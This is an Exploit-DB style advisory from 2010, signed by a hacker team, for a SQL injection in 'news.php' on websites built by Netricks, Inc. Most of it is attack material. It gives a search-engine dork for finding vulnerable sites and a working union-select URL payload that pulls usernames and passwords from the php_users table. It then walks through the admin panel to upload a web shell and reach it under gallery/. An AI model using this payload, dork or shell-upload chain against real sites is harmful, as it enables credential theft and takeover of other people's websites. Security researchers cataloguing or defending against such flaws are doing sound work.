Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection

EDB-ID:

12736

CVE:

N/A




Platform:

PHP

Date:

2010-05-25


    @@@@@@@@@  @@@@@@@@     @@@@        @@@     @@@        @@@@@@@@     @@@@@@@@@@@@
    @@@@@@@@@  @@@@@@@@    @@@@@@      @@@@@@  @@@@@@      @@@@@@@@     @@@@@@@  @@@
       @@@     @@          @@  @@     @@    @@ @@   @@     @@           @@    @@@@@@
       @@@     @@          @@  @@     @@    @@ @@   @@     @@           @@     
       @@@     @@@@@@      @@@@@@     @@    @@ @@   @@  -  @@@@@@@      @@
       @@@     @@@@@@      @@@@@@     @@    @@@@@   @@  -  @@@@@@@      @@  
       @@@     @@          @@  @@     @@            @@     @@           @@     @@@@
       @@@     @@          @@  @@     @@            @@     @@            @@      @@
       @@@     @@@@@@@@    @@  @@     @@            @@     @@@@@@@@       @@     @@ 
       @@@     @@@@@@@@    @@  @@     @@            @@     @@@@@@@@        @@@@@@@@  Dr.SiLnT HilL


===================================================================================================================================
                    Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability
===================================================================================================================================



####################################################################################################################################

# Name: Website Design and Hosting By Netricks, Inc.

# Date: 25-05-2010

# vendor: http://www.netricks.com

# Dork: intext:" Website Design and Hosting By Netricks, Inc."

# Discovered By: Dr.SiLnT HilL

# Contact : i0x0@hotmail.com

# MY Team : TeaM HacKer Egypt

###################################################################################################################################



[+] SQL Injection Vulnerability:


[+] Vulnerability: http://[site]/[path]/news.php?ax=v&n=10&id=10&nid==[SQL Injection]


[+][+] Exploit [+][+]


 http://[site]/[path]/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,group_concat(username,0x3e,password),3,4,5+from+php_users--


[+][+] Admin Panel [+][+]


http://localhost/[path]/admin


[+][+] Upload your shell [+][+]


http://[site]/[path]/admin/content.php?ax=file_upload



[+][+] your shell [+][+]


http://[site]/[path]/gallery/shell.php


[+][+] Example [+][+]


###################################################################################################################################